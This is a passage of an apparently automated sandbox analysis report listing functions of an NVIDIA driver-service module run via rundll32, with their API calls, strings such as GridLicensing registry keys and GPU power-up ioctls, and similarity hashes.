StrStrIW.SHLWAPI ref: 00007FFDFA8ADE41
SetupDiGetDeviceRegistryPropertyW.SETUPAPI ref: 00007FFDFA8ADE85
lstrcmpiW.KERNEL32 ref: 00007FFDFA8ADEA2
CM_Get_DevNode_Status.SETUPAPI ref: 00007FFDFA8ADECB
SetupDiOpenDevRegKey.SETUPAPI ref: 00007FFDFA8ADF1F
RegCloseKey.ADVAPI32 ref: 00007FFDFA8ADF97
SetupDiEnumDeviceInfo.SETUPAPI ref: 00007FFDFA8ADFAA
SetupDiDestroyDeviceInfoList.SETUPAPI ref: 00007FFDFA8ADFBB
CloseHandle.KERNEL32 ref: 00007FFDFA8ADFC4

Strings

nvlddmkm, xrefs: 00007FFDFA8ADE8F
ven_10de, xrefs: 00007FFDFA8ADE33
?, xrefs: 00007FFDFA8ADEF5

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Setup$Device$ErrorLast$CloseInfo$ActiveClassConsoleDestroyDevsEnumEnumerateFreeGet_HandleInstanceListMemoryNode_OpenPropertyQueryRegistrySessionSessionsStatusTokenUserlstrcmpi
String ID: ?$nvlddmkm$ven_10de
API String ID: 3270881034-1305278625
Opcode ID: eb7af57e16ea19afebeb06d5aa828590df456eb448458f8206ee469e4c390acf
Instruction ID: 8a38c4b49383e56a7434ef16dc3cbeb6e845bca0cebdff1c0ff8594b607a7a85
Opcode Fuzzy Hash: eb7af57e16ea19afebeb06d5aa828590df456eb448458f8206ee469e4c390acf
Instruction Fuzzy Hash: 0F91D536B18B4296E7189F21E824AAA77A0FF84B84F544171DA6E87BDCDF7CD544C700

Function 00007FFDFA8ABCB8 Relevance: 30.0, APIs: 13, Strings: 4, Instructions: 224memorylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFA8AC740: VerSetConditionMask.KERNEL32 ref: 00007FFDFA8AC784
Part of subcall function 00007FFDFA8AC740: VerifyVersionInfoW.KERNEL32 ref: 00007FFDFA8AC7AE

GetFileAttributesW.KERNEL32 ref: 00007FFDFA8ABD37
LocalAlloc.KERNEL32 ref: 00007FFDFA8ABD5D
SetLastError.KERNEL32 ref: 00007FFDFA8ABD84
SetLastError.KERNEL32 ref: 00007FFDFA8ABDAC
SetLastError.KERNEL32 ref: 00007FFDFA8ABDC3

Part of subcall function 00007FFDFA8AB514: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFDFA8AB5C6
Part of subcall function 00007FFDFA8AB514: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFDFA8AB5F6
Part of subcall function 00007FFDFA8AB514: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFDFA8AB62F
Part of subcall function 00007FFDFA8AB514: LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FFDFA8AB679

GetProcAddress.KERNEL32 ref: 00007FFDFA8ABE08
GetProcAddress.KERNEL32 ref: 00007FFDFA8ABE38
GetProcAddress.KERNEL32 ref: 00007FFDFA8ABE68
LocalAlloc.KERNEL32 ref: 00007FFDFA8ABEF6
LocalAlloc.KERNEL32 ref: 00007FFDFA8ABF8D
LocalFree.KERNEL32 ref: 00007FFDFA8ABFF9
LocalFree.KERNEL32 ref: 00007FFDFA8AC002
SetLastError.KERNEL32 ref: 00007FFDFA8AC02D

Strings

Setupapi.dll, xrefs: 00007FFDFA8ABDD9
SetupDiGetDevicePropertyW, xrefs: 00007FFDFA8ABDFE
SetupGetInfDriverStoreLocationW, xrefs: 00007FFDFA8ABE2E
SetupDiDestroyDeviceInfoList, xrefs: 00007FFDFA8ABE5E

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: AddressLocalProc$AllocErrorLast$Free$AttributesConditionFileInfoMaskVerifyVersion
String ID: SetupDiDestroyDeviceInfoList$SetupDiGetDevicePropertyW$SetupGetInfDriverStoreLocationW$Setupapi.dll
API String ID: 479516965-190797902
Opcode ID: 0b715500c0f8fc41f574a7c5c59d9d46af33ce9e7985e7b075288412ebd2f598
Instruction ID: 0d00c399a832037c593b55ce23e5aff6eae2f5fb3b935fec76079ce30e0b89c3
Opcode Fuzzy Hash: 0b715500c0f8fc41f574a7c5c59d9d46af33ce9e7985e7b075288412ebd2f598
Instruction Fuzzy Hash: 43A18E32B28B4292EB189B15E86497973A0FF88B80F544075DA6D477ECEF7DE845C710

Function 00007FFDFA8AAF20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 171memorylibraryloaderCOMMON

Download Yara Rule

APIs

VerSetConditionMask.KERNEL32 ref: 00007FFDFA8AAF86
VerSetConditionMask.KERNEL32 ref: 00007FFDFA8AAF96
VerSetConditionMask.KERNEL32 ref: 00007FFDFA8AAFA6
VerifyVersionInfoW.KERNEL32 ref: 00007FFDFA8AAFE0
GetFullPathNameW.KERNEL32 ref: 00007FFDFA8AB01E
LocalAlloc.KERNEL32 ref: 00007FFDFA8AB038
GetFullPathNameW.KERNEL32 ref: 00007FFDFA8AB055
GetProcAddress.KERNEL32 ref: 00007FFDFA8AB0A8
LocalAlloc.KERNEL32 ref: 00007FFDFA8AB118
LocalFree.KERNEL32 ref: 00007FFDFA8AB186
LocalFree.KERNEL32 ref: 00007FFDFA8AB1A3
LocalFree.KERNEL32 ref: 00007FFDFA8AB1AC

Strings

SHGetFolderPathW, xrefs: 00007FFDFA8AB09E
&, xrefs: 00007FFDFA8AAF65
*, xrefs: 00007FFDFA8AAF70
$, xrefs: 00007FFDFA8AAF50
Shell32.dll, xrefs: 00007FFDFA8AB086

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Local$ConditionFreeMask$AllocFullNamePath$AddressInfoProcVerifyVersion
String ID: $$&$*$SHGetFolderPathW$Shell32.dll
API String ID: 3471609363-2843092907
Opcode ID: 8640a03f4aaf58c663f57e001b194bfeddaab4f8c3ff8af08dbea0840aacfcf9
Instruction ID: c2814a095d551842358a702b43cf5e73b7177f72235db3189f72b9d88f8926b8
Opcode Fuzzy Hash: 8640a03f4aaf58c663f57e001b194bfeddaab4f8c3ff8af08dbea0840aacfcf9
Instruction Fuzzy Hash: 2071B035B2974382FB5C8B11E868AB57391AF88B80F844075DD6E4B7E9EF7CE4468710

Function 00007FFDFA969470 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 205sleeplibraryloaderCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00007FFDFA9694EE
TlsGetValue.KERNEL32 ref: 00007FFDFA969508
TlsGetValue.KERNEL32 ref: 00007FFDFA969527
CreateWaitableTimerA.KERNEL32 ref: 00007FFDFA969561
GetModuleHandleA.KERNEL32(?), ref: 00007FFDFA9695AE
GetProcAddress.KERNEL32 ref: 00007FFDFA9695BE
WaitForMultipleObjectsEx.KERNEL32 ref: 00007FFDFA96966E
Sleep.KERNEL32 ref: 00007FFDFA96969B
CloseHandle.KERNEL32 ref: 00007FFDFA9696CC
TlsGetValue.KERNEL32 ref: 00007FFDFA9696E2
ResetEvent.KERNEL32 ref: 00007FFDFA9696EF
_CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA969701
CloseHandle.KERNEL32 ref: 00007FFDFA969714
CloseHandle.KERNEL32 ref: 00007FFDFA96972C

Strings

KERNEL32.DLL, xrefs: 00007FFDFA9695A7
SetWaitableTimerEx, xrefs: 00007FFDFA9695B7

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: HandleValue$Close$AddressCreateEventExceptionModuleMultipleObjectsProcResetSleepThrowTimerWaitWaitable
String ID: KERNEL32.DLL$SetWaitableTimerEx
API String ID: 484217208-2877992516
Opcode ID: 4715cab3ce99e94436d873c4ee6993d4b398b55e6045c3021ea16abfb4510cfb
Instruction ID: 8e26f9313fcfd7622fc428e93c4273283ca5bd6d1711338a7a8d354b943f6210
Opcode Fuzzy Hash: 4715cab3ce99e94436d873c4ee6993d4b398b55e6045c3021ea16abfb4510cfb
Instruction Fuzzy Hash: C8915136B08B4286EB588F25A460A6973A4FF457A4F940375DA7E827ECDF3DE445C700

Function 00007FFDFA8DEA05 Relevance: 26.7, APIs: 3, Strings: 12, Instructions: 450stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFA8DE228: _Init_thread_footer.LIBCMT ref: 00007FFDFA8DE2EB

lstrcatW.KERNEL32 ref: 00007FFDFA8DEDFA
SHGetValueW.SHLWAPI ref: 00007FFDFA8DEE30
SHGetValueW.SHLWAPI ref: 00007FFDFA8DEE6E

Part of subcall function 00007FFDFA921D40: new.LIBCMT ref: 00007FFDFA921D6B

Part of subcall function 00007FFDFA8F15B0: new.LIBCMT ref: 00007FFDFA8F15D7

Strings

NvXDCore.cpp, xrefs: 00007FFDFA8DEA0E
\NVIDIA Corporation, xrefs: 00007FFDFA8DEB82
InitGridCloudLicenseStateMachine, xrefs: 00007FFDFA8DEA15
ProxyServerPort, xrefs: 00007FFDFA8DEE59
TrustedStorage, xrefs: 00007FFDFA8DEB14, 00007FFDFA8DEB23
SOFTWARE\NVIDIA Corporation\Global\GridLicensing, xrefs: 00007FFDFA8DEDF3
Initializing state machine for nvvsvc , xrefs: 00007FFDFA8DEFD5
Local storage directory:, xrefs: 00007FFDFA8DED11
vGPU Licensing, xrefs: 00007FFDFA8DEB41, 00007FFDFA8DEB50
SYSTEM\CurrentControlSet\Services\nvlddmkm\Global\GridLicensing, xrefs: 00007FFDFA8DEDEA
Failed to read configurations from client configuration token. Error :, xrefs: 00007FFDFA8DEA97
ProxyServerAddress, xrefs: 00007FFDFA8DEE1B

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Value$Init_thread_footerlstrcat
String ID: Failed to read configurations from client configuration token. Error :$InitGridCloudLicenseStateMachine$Initializing state machine for nvvsvc $Local storage directory:$NvXDCore.cpp$ProxyServerAddress$ProxyServerPort$SOFTWARE\NVIDIA Corporation\Global\GridLicensing$SYSTEM\CurrentControlSet\Services\nvlddmkm\Global\GridLicensing$TrustedStorage$\NVIDIA Corporation$vGPU Licensing
API String ID: 1249827902-1287553087
Opcode ID: 9e2f2b48dc19ea6c6443c6e350ea1b28c2b662cc212661bcc2b1b4f611fec7c4
Instruction ID: 252a9924c2e8d07cb662c129d6e7ac805d8a5bb74d66294fdb849594481b32af
Opcode Fuzzy Hash: 9e2f2b48dc19ea6c6443c6e350ea1b28c2b662cc212661bcc2b1b4f611fec7c4
Instruction Fuzzy Hash: C5226E32B24B8299EB14DF60E8609ED37A4FB45788F801576EA5D97BADDF38D204C740

Function 00007FFDFA8ADA48 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 155processCOMMON

Download Yara Rule

APIs

CreateEnvironmentBlock.USERENV ref: 00007FFDFA8ADAA0
GetLastError.KERNEL32 ref: 00007FFDFA8ADAAA
DestroyEnvironmentBlock.USERENV ref: 00007FFDFA8ADB57
GetSystemDirectoryW.KERNEL32 ref: 00007FFDFA8ADB96
PathAddBackslashW.SHLWAPI ref: 00007FFDFA8ADBA6
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FFDFA8ADBDB
CreateProcessAsUserW.ADVAPI32 ref: 00007FFDFA8ADC5B
GetLastError.KERNEL32 ref: 00007FFDFA8ADC65
CloseHandle.KERNEL32 ref: 00007FFDFA8ADC72
CloseHandle.KERNEL32 ref: 00007FFDFA8ADC7D

Strings

WinSta0\Default, xrefs: 00007FFDFA8ADBEF
NVSVC64.DLL, xrefs: 00007FFDFA8ADBAC
%srundll32.exe %s%s,nvsvcErrorReport %d, xrefs: 00007FFDFA8ADBC8

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: BlockCloseCreateEnvironmentErrorHandleLast$BackslashDestroyDirectoryPathProcessSystemUserswprintf
String ID: %srundll32.exe %s%s,nvsvcErrorReport %d$NVSVC64.DLL$WinSta0\Default
API String ID: 1123984594-3221355949
Opcode ID: e05e0232ac5049a91207f20117e5df698637018310e2fbd1035073e77ffb8e7d
Instruction ID: 0b8d71f79dbf141348eecf294102a1ad8d63ff93b2928137504bf8581d1a3031
Opcode Fuzzy Hash: e05e0232ac5049a91207f20117e5df698637018310e2fbd1035073e77ffb8e7d
Instruction Fuzzy Hash: 43618032B18A4295FB189B61E860AA973A0FF84784F804175DD6E876DDDF3CE545CB10

Function 00007FFDFA8AC878 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 202libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,00007FFDFA8ABBB5), ref: 00007FFDFA8AC8DD
GetProcAddress.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,00007FFDFA8ABBB5), ref: 00007FFDFA8AC90D
GetProcAddress.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,00007FFDFA8ABBB5), ref: 00007FFDFA8AC93D
GetProcAddress.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,00007FFDFA8ABBB5), ref: 00007FFDFA8AC96D
GetProcAddress.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,00007FFDFA8ABBB5), ref: 00007FFDFA8AC99D

Part of subcall function 00007FFDFA8AAB70: VerSetConditionMask.KERNEL32 ref: 00007FFDFA8AABB0
Part of subcall function 00007FFDFA8AAB70: VerifyVersionInfoW.KERNEL32 ref: 00007FFDFA8AABDE

LocalAlloc.KERNEL32(?,?,00000000,00000000,00000000,?,00007FFDFA8ABBB5), ref: 00007FFDFA8ACA66
LocalFree.KERNEL32(?,?,00000000,00000000,00000000,?,00007FFDFA8ABBB5), ref: 00007FFDFA8ACB25

Strings

SetupDiGetDeviceRegistryPropertyW, xrefs: 00007FFDFA8AC933
Setupapi.dll, xrefs: 00007FFDFA8AC8AE
SetupDiEnumDeviceInfo, xrefs: 00007FFDFA8AC903
SetupDiGetClassDevsW, xrefs: 00007FFDFA8AC8D3
SetupDiGetDeviceInterfaceDetailW, xrefs: 00007FFDFA8AC963
SetupDiDestroyDeviceInfoList, xrefs: 00007FFDFA8AC993

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: AddressProc$Local$AllocConditionFreeInfoMaskVerifyVersion
String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInfo$SetupDiGetClassDevsW$SetupDiGetDeviceInterfaceDetailW$SetupDiGetDeviceRegistryPropertyW$Setupapi.dll
API String ID: 576420853-2811369298
Opcode ID: 54efa2f6256b3a210f47ed37694e6d5c69e2a3bfbd89194f0be96b3c32897933
Instruction ID: 031b2f322f6635625ed3b29f5a2e996033c2ecf9fd51bc5f35151738549fa987
Opcode Fuzzy Hash: 54efa2f6256b3a210f47ed37694e6d5c69e2a3bfbd89194f0be96b3c32897933
Instruction Fuzzy Hash: 3181A272B19B0381EB58CB56E86097573A1BF48B94F4880B5CD6D477E8EF7DE0868310

Function 00007FFDFA8DC180 Relevance: 19.7, APIs: 8, Strings: 3, Instructions: 413registrycomCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32 ref: 00007FFDFA8DC21C
StringFromGUID2.OLE32 ref: 00007FFDFA8DC2CB
RegQueryInfoKeyW.ADVAPI32 ref: 00007FFDFA8DC41F
RegCloseKey.ADVAPI32 ref: 00007FFDFA8DC430
RegQueryInfoKeyW.ADVAPI32 ref: 00007FFDFA8DC568
RegCloseKey.ADVAPI32 ref: 00007FFDFA8DC579
RegCloseKey.ADVAPI32 ref: 00007FFDFA8DC5A3
RegCloseKey.ADVAPI32 ref: 00007FFDFA8DC5B0

Part of subcall function 00007FFDFA8AE290: GetModuleHandleW.KERNEL32 ref: 00007FFDFA8AE2C3
Part of subcall function 00007FFDFA8AE290: GetProcAddress.KERNEL32 ref: 00007FFDFA8AE2D8

Strings

CLSID\, xrefs: 00007FFDFA8DC2E4, 00007FFDFA8DC45E
\Required Categories, xrefs: 00007FFDFA8DC366
\Implemented Categories, xrefs: 00007FFDFA8DC4D2

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Close$InfoQuery$AddressCreateFromHandleInstanceModuleProcString
String ID: CLSID\$\Implemented Categories$\Required Categories
API String ID: 2927819212-4092563799
Opcode ID: 18c72b1237298cf9d965c8f94c0d57b48f585dad39b7ed6021c3aa5051de9b85
Instruction ID: e8eb3e97040843499aa6595d8179ff182de92e4ccaef280b90afd743c2c38efd
Opcode Fuzzy Hash: 18c72b1237298cf9d965c8f94c0d57b48f585dad39b7ed6021c3aa5051de9b85
Instruction Fuzzy Hash: 0E02F6B6B1874681EB289B71E460ABD23A2FF44784F640676DA6D47ADCCF7CE445C700

Function 00007FFDFA906B7C Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 138fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FFDFA906BC2
DeviceIoControl.KERNEL32 ref: 00007FFDFA906CD0
CloseHandle.KERNEL32 ref: 00007FFDFA906DB8

Part of subcall function 00007FFDFA8DE228: _Init_thread_footer.LIBCMT ref: 00007FFDFA8DE2EB

Strings

ZeroPowerOnBootUtil.cpp, xrefs: 00007FFDFA906C03, 00007FFDFA906C12, 00007FFDFA906D0E, 00007FFDFA906D1D
PowerOnDGpu, xrefs: 00007FFDFA906C2F, 00007FFDFA906C3E, 00007FFDFA906D3A, 00007FFDFA906D49
9, xrefs: 00007FFDFA906D99
Failed to open NvPciFilter driver interface, xrefs: 00007FFDFA906C57
NVIDIA_NVPCIFLT_IOCTL_POWERUP_GPU failed, xrefs: 00007FFDFA906D62
\\.\nvpciflt, xrefs: 00007FFDFA906BBB

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandleInit_thread_footer
String ID: 9$Failed to open NvPciFilter driver interface$NVIDIA_NVPCIFLT_IOCTL_POWERUP_GPU failed$PowerOnDGpu$ZeroPowerOnBootUtil.cpp$\\.\nvpciflt
API String ID: 4084529720-463136028
Opcode ID: bbb467a6571d8433b9d5e4c1975cbd9dc0dba2bcc6484821e55f6f00760f6908
Instruction ID: 60196538b308cad3215a8781a6d58f3a26a1269f1ec4f1cbc309495f2e33dd7a
Opcode Fuzzy Hash: bbb467a6571d8433b9d5e4c1975cbd9dc0dba2bcc6484821e55f6f00760f6908
Instruction Fuzzy Hash: 26612D36B19B12D9E714CFA0E4A05ED33A4FB44388B844276EA6C57BADDF38D219C350

Function 00007FFDFA99DB78 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 226COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FFDFA990624: GetLastError.KERNEL32(?,?,?,00007FFDFA978F8B,?,?,00000000,00007FFDFA983470), ref: 00007FFDFA990633
Part of subcall function 00007FFDFA990624: SetLastError.KERNEL32(?,?,?,00007FFDFA978F8B,?,?,00000000,00007FFDFA983470), ref: 00007FFDFA9906D1

TranslateName.LIBCMT ref: 00007FFDFA99DBE5
